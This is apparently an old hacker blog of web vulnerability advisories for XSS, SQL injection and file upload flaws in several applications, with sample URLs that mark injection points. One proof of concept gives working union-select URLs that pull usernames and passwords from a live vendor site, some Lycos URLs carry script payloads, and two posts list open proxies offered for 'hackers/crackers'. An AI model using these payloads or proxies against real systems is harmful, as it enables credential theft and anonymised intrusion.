http://obm-host/user/user_index.php?action=search
&tf_login=&tf_lastname=[XSS]

http://obm-host/list/list_index.php?action=search
&tf_name=[XSS]

http://obm-host/list/list_index.php?action=search
&tf_name=&tf_contact=[XSS]

http://obm-host/group/group_index.php?action=sear
ch&tf_name=&tf_user=&page=&new_order=[SQL]

http://obm-host/group/group_index.php?action=sear
ch&tf_name=&tf_user=&page=&new_order=group_email
&order_dir=[SQL]

http://obm-host/?action=search&tf_login=&tf_last
name=&sel_perms=&tf_email=&tf_desc=&tf_group=&cb
_archive=&page=&new_order=[SQL]

http://obm-host/user/user_index.php?action=searc
h&tf_login=&tf_lastname=&sel_perms=&tf_email=&tf
_desc=&tf_group=&cb_archive=&page=&new_order=use
robm_lastname&order_dir=[SQL]

http://obm-host/list/list_index.php?action=sear
ch&tf_name=&tf_contact=&sel_market=&page=&new_o
rder=list_subject&order_dir=[SQL]

http://obm-host/list/list_index.php?action=searc
h&tf_name=&tf_contact=&sel_market=&page=&new_or
der=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=&tf_datebefore=[XSS]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=&tf_datebefore=&page=&new_or
der=company_vat&order_dir=DESC&entity=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=&tf_datebefore=&page=&new_or
der=company_vat&order_dir=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=&tf_datebefore=&page=&new_or
der=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

KnowledgeTree Open Source XSS vuln.

2006-06-06T14:42:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 6 june 2006
vendor:www.ktdms.com/products/knowledgetree
affected versions:3.0.3 and prior
###############################################

Vuln. Description:

KnowledgeTree contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "fDocumentId" parameter in "view.php" and input passed to the "fSearchableText" parameter in "/search/simpleSearch.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Also attacker will get full installisations path with error message while testing "fDocumentId" parameter in "view.php".

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SquirrelMail <=1.5.1 XSS vuln.

2006-06-06T13:06:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 6 june 2006
vendor:http://www.squirrelmail.org/
affected versions:
1.4.6-20060409 latest stable
1.4.7[CVS]
1.5.1-20060409 Development Version
and prior versions also can be affected
###############################################

Vuln. Description:

SquirrelMail contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "mailbox" parameter in "search.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

LabWiki XSS vuln.

2006-06-05T08:29:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.bioinformatics.org/phplabware/labwiki/
affected versions:1.0 and prior
###############################################

Vuln. Description:

LabWiki contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "help" parameter in "recentchanges.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Particle Wiki SQL inj.

2006-06-05T07:32:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.particlesoft.net/particlewiki/
affected versions:1.0.2 and prior
###############################################

Vuln. Description:

Particle Wiki contains a flaw that allows a remote sql injection attacks.Input passed to the "version" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC:

# Exploited by FarhadKey from http://www.kapda.ir

Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select
%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select
%201,1,1,1,1,password%20from%20pwiki_users%20/*

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Particle Gallery SQL inj.

2006-06-05T07:18:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.particlesoft.net/particlegallery/
affected versions:1.0.0 and prior
###############################################

Vuln. Description:

Particle Gallery contains a flaw that allows a remote sql injection attacks.Input passed to the "imageid" parameter in "viewimage.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Vendor patch:
Update to 1.0.1
or
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Socks&Proxies 4 today

2006-06-02T17:08:00.000+02:00

As always all proxies are without logging* feature:) and proxys are https, but socks 4/5. Thanks to ~d4rk*byt3~

HTTP: 201.252.14.226:27619
Sock: 201.252.14.226:20515
RUSSIAN FEDERATION, MOSCOW, MOSKVA

HTTP: 83.28.24.131:35214
Sock: 83.28.24.131:38183
POLAND, RZESZOW, PODKARPACKIE

HTTP: 62.241.67.38:35812
Sock: 62.241.67.38:19970
FRANCE, -, -

HTTP: 63.246.180.69:37319
Sock: 63.246.180.69:12669
UNITED STATES, AUSTIN, TEXAS

HTTP: 83.9.46.126:18743
Sock: 83.9.46.126:10652
POLAND, -, -

HTTP: 83.29.204.146:36558
Sock: 83.29.204.146:42082
POLAND, LUBLIN, LUBELSKIE

HTTP: 219.171.8.217:14342
Sock: 219.171.8.217:37433
JAPAN, TOKYO, TOKYO

HTTP: 81.213.163.221:9130
Sock: 81.213.163.221:54257
TURKEY, -, -

HTTP: 213.22.210.170:39181
Sock: 213.22.210.170:33345
PORTUGAL, -, -

HTTP: 80.53.47.210:54306
Sock: 80.53.47.210:25106
POLAND, -, -

HTTP: 62.89.114.165:54158
Sock: 62.89.114.165:27006
POLAND, KATOWICE, SLASKIE

HTTP: 205.200.61.47:59863
Sock: 205.200.61.47:59961
CANADA, WINNIPEG, MANITOBA

HTTP: 193.77.242.174:12531
Sock: 193.77.242.174:34704
SLOVENIA, LJUBLJANA, LJUBLJANA

HTTP: 84.54.138.10:5664
Sock: 84.54.138.10:15322
BULGARIA, -, -

HTTP: 213.65.241.156:55487
Sock: 213.65.241.156:53241
SWEDEN, ALINGSåS, VASTRA GOTALAND

HTTP: 83.38.36.165:60205
Sock: 83.38.36.165:58491
SPAIN, ALICANTE, VALENCIA

HTTP: 66.146.215.193:52026
Sock: 66.146.215.193:34666
UNITED STATES, CHICAGO, ILLINOIS

HTTP: 68.252.234.238:61976
Sock: 68.252.234.238:11072
UNITED STATES, CHICAGO, ILLINOIS

HTTP: 81.27.200.203:43581
Sock: 81.27.200.203:48051
CZECH REPUBLIC, BRNO, JIHOMORAVSKY KRAJ

HTTP: 89.138.83.139:34467
Sock: 89.138.83.139:56029
KENYA, KISUMU, NYANZA

HTTP: 218.152.155.233:27693
Sock: 218.152.155.233:25030
KOREA, REPUBLIC OF, -, -

HTTP: 82.42.186.109:59724
Sock: 82.42.186.109:4957
UNITED KINGDOM, EDINBURGH, SCOTLAND

HTTP: 84.237.193.203:44038
Sock: 84.237.193.203:64922
LATVIA, -, -

HTTP: 200.8.23.29:9820
Sock: 200.8.23.29:22932
VENEZUELA, VALENCIA, CARABOBO

HTTP: 69.157.138.107:49012
Sock: 69.157.138.107:60825
CANADA, QUEBEC, QUEBEC

HTTP: 85.84.16.251:46895
Sock: 85.84.16.251:31387
SPAIN, BILBAO, PAIS VASCO

HTTP: 70.241.68.250:19938
Sock: 70.241.68.250:51197
UNITED STATES, HOUSTON, TEXAS

HTTP: 82.236.182.179:27736
Sock: 82.236.182.179:6400
FRANCE, -, -

HTTP: 24.14.158.122:56762
Sock: 24.14.158.122:40178
UNITED STATES, OAK PARK, ILLINOIS

HTTP: 221.140.240.183:59148
Sock: 221.140.240.183:35512
KOREA, REPUBLIC OF, -, -

HTTP: 201.145.213.196:8862
Sock: 201.145.213.196:60506
MEXICO, -, -

HTTP: 210.1.96.92:45676
Sock: 210.1.96.92:31813
PHILIPPINES, MANILA, MANILA

HTTP: 71.136.41.203:35541
Sock: 71.136.41.203:53675
UNITED STATES, SAN DIEGO, CALIFORNIA

HTTP: 219.254.44.29:10627
Sock: 219.254.44.29:33141
KOREA, REPUBLIC OF, SEOUL, KYONGGI-DO

HTTP: 213.13.198.239:10790
Sock: 213.13.198.239:47686
PORTUGAL, MATOSINHOS, PORTO

HTTP: 201.78.63.185:33753
Sock: 201.78.63.185:26856
BRAZIL, -, -

HTTP: 190.55.14.55:50667
Sock: 190.55.14.55:58244
ARGENTINA, RAMOS MEJIA, BUENOS AIRES

HTTP: 85.137.20.225:13664
Sock: 85.137.20.225:41080
SPAIN, -, -

HTTP: 65.74.86.12:25740
Sock: 65.74.86.12:4778
UNITED STATES, KODIAK, ALASKA

HTTP: 68.12.79.131:19200
Sock: 68.12.79.131:23696
UNITED STATES, OKLAHOMA CITY, OKLAHOMA

HTTP: 201.58.156.144:29653
Sock: 201.58.156.144:9521
BRAZIL, -, -

HTTP: 68.11.229.251:8060
Sock: 68.11.229.251:52868
UNITED STATES, BATON ROUGE, LOUISIANA

HTTP: 70.127.3.45:54696
Sock: 70.127.3.45:35560
UNITED STATES, HERNDON, VIRGINIA

HTTP: 84.56.171.51:48700
Sock: 84.56.171.51:14620
GERMANY, STUTTGART, BADEN-WURTTEMBERG

HTTP: 218.11.16.242:14934
Sock: 218.11.16.242:46344
CHINA, HEBEI, HEBEI

Vulnerabilities and Public +personal...

2006-06-02T02:06:00.000+02:00

In few monthes i had posted reported some harmfull* vulnerabilities, but i think is enough for me.
My friend der4444 some time ago had writen that public exploits s*cks, in my case there was no public exploits or some how to* for those guys who call themselfes "hackers".
I will post/report maximum 10-15 more , and thats will be end.
Of offcourse not for us , not for you .. just for me.
I think that VietMafia will continue sharing in public part of his job and time.
In my case if i had before few minutes at school to check&report some security holes , than now its over with my free time.
Even i tried to manage my time for my small hobby,..but...but... oh..yeah ..summer is in europe too:) So maybe i will continue with my reports on autumn , i hope so..

And of course in summer i will not have enough time to learn english , thats means those who had&have problems with my english writing style/grammar will also in future have same problems.. In my native language you will not find any translator wich will work with my style* , so i think i will continue typing in something similar to english.

About blog and forum, they will exist as always .

Even end will come soon ...im still r0t.

Unak CMS vuln.

2006-06-02T02:01:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 2 june 2006
vendor:http://www.unak.net
affected versions:1.5 RC2 and prior
###############################################

Vuln. Description:

1) Input passed to the "u_a" and "u_s" parameters is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input to the "u_a" and "u_s" parameters is also not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Lore <=1.5.6 SQL injection vuln.

2006-06-01T09:59:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 1 june 2006
vendor:http://www.pineappletechnologies.com/products/lore/
affected versions:1.5.6 and prior
###############################################

Vuln. Description:

Lore contains a flaw that allows a remote sql injection attacks.Input passed to the "article_id" parameter in "comment.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Status:
reported to vendor
###############################################
More information @ unsecured-systems.com/forum/

mchsi.com + att.net XSS&Full path disclosure

2006-06-01T03:25:00.000+02:00

As always nothin' special ,similar stuff to lycos .

http://ackley.mediacomtoday.com/community/news/
video/index.php?id=0531dvs_dozier_ER&ds=Full Path :)

http://communities.att.net/pe/action/profile
/resetpassword?returnUrl=[XSS]

XSS in Lycos.com

2006-06-01T03:04:00.000+02:00

Here will be some examples:

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=
6&m_PR=2&m_CBURL=%22%3Cscript%3Ealert('r0t')%3C/script%3E

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&m_PR
=2&m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&m_CBERRURL
=%22%3Cscript%3Ealert('r0t')%3C/script%3E

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&m_PR=2
&m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&m_CBERRURL=ht
tp%3A%2F%2Fpridels.blogspot.com%2F&m_LANG=1&Z=1149121877&m_
AL=2&m_DL_FREE=%22%3Cscript%3Ealert('r0t')%3C/script%3E

ps.lycos contains alot more XSS and other vuln.
I dont know how much can cost db from lycos:)

DGNews v 1.5 File Upload Vuln.

2006-05-29T16:50:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 29 may 2006
vendor:www.diangemilang.com/dgscripts.php
affected versions:v 1.5 and prior
###############################################

Vuln. Description:

Due to improper checks of file extensions in admin/upprocess.php it is possible to upload arbitrary files to the "img" directory. This can e.g. be exploited to upload and execute malicious PHP scripts.

note: Successful exploitation requires access to the administration section.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

proxy&socks 4 hackers/crackers

2006-05-27T21:18:00.000+02:00

UNITED STATES, BANGOR, MAINE
HTTPss: 142.167.20.183:8176
Sockss: 142.167.20.183:5268

HTTPss: 89.102.105.246:48045
Sockss: 89.102.105.246:38399

HTTPs: 206.192.43.188:59226
Socks: 206.192.43.188:61050
UNITED STATES, COUDERSPORT, PENNSYLVANIA

HTTPs: 82.46.152.144:40509
Socks: 82.46.152.144:20800
UNITED KINGDOM, BIRMINGHAM, ENGLAND

HTTPs: 69.145.114.241:48424
Socks: 69.145.114.241:33464
UNITED STATES, GRAND JUNCTION, COLORADO

HTTPs: 84.237.193.203:52083
Socks: 84.237.193.203:52985
LATVIA, -, -

HTTPs: 83.24.127.135:59158
Socks: 83.24.127.135:26084
POLAND, WARSAW, MAZOWIECKIE

HTTPs: 82.176.14.140:26544
Socks: 82.176.14.140:42765
NETHERLANDS, VLISSINGEN, ZEELAND

HTTPs: 82.42.159.153:51430
Socks: 82.42.159.153:50484
UNITED KINGDOM, EDINBURGH, SCOTLAND

HTTPs: 88.118.194.26:37838
Socks: 88.118.194.26:58952
LITHUANIA, -, -

HTTPs: 83.5.41.58:10250
Socks: 83.5.41.58:53175
POLAND, -, -

HTTPs: 62.83.4.29:26856
Socks: 62.83.4.29:60138
SPAIN, BARCELONA, CATALUñA

HTTPs: 85.168.58.180:18160
Socks: 85.168.58.180:59005
FRANCE, PARIS, ILE-DE-FRANCE

HTTPs: 200.102.182.138:20185
Socks: 200.102.182.138:10553
BRAZIL, PORTO ALEGRE, RIO GRANDE DO SUL

HTTPs: 63.98.143.110:15336
Socks: 63.98.143.110:5228
UNITED STATES, ST. SIMONS ISLAND, GEORGIA

HTTPs: 62.241.65.63:49491
Socks: 62.241.65.63:63991
SPAIN, GIJON, ASTURIAS

HTTPs: 82.216.127.121:64932
Socks: 82.216.127.121:40544
FRANCE, -, -

HTTPs: 85.237.175.54:56049
Socks: 85.237.175.54:43902
POLAND, -, -

HTTPs: 218.18.33.2:50839
Socks: 218.18.33.2:63245
CHINA, SHENZHEN, GUANGDONG

HTTPs: 84.90.3.174:7816
Socks: 84.90.3.174:25656
PORTUGAL, -, -

HTTPs: 213.89.95.208:55133
Socks: 213.89.95.208:47460
SWEDEN, STOCKHOLM, STOCKHOLM

HTTPs: 65.94.149.151:12518
Socks: 65.94.149.151:37552
CANADA, MONTREAL, QUEBEC

HTTPs: 12.226.114.115:20798
Socks: 12.226.114.115:49122
UNITED STATES, MILLSBORO, DELAWARE

HTTPs: 88.247.80.192:53302
Socks: 88.247.80.192:8622
TURKEY, -, -

HTTPs: 65.35.87.176:46582
Socks: 65.35.87.176:47038
UNITED STATES, MELBOURNE, FLORIDA

EVA-Web <=2.1.2 vuln.

2006-05-27T00:03:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 27 may 2006
vendor:http://spip-edu.edres74.net/
affected versions:2.1.2 and prior
###############################################

Vuln. Description:

EVA-Web contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "debut_image" parameter in "article-album.php3" and "date" parameter in "rubrique.php3" and "perso","aide" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/article-album.php3?id_article=39&debut_image=[XSS]
/rubrique.php3?id_rubrique=29&date=[XSS]
/?perso=[XSS]
/?aide=[XSS]

+
/?perso=full path
/?aide=full path

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/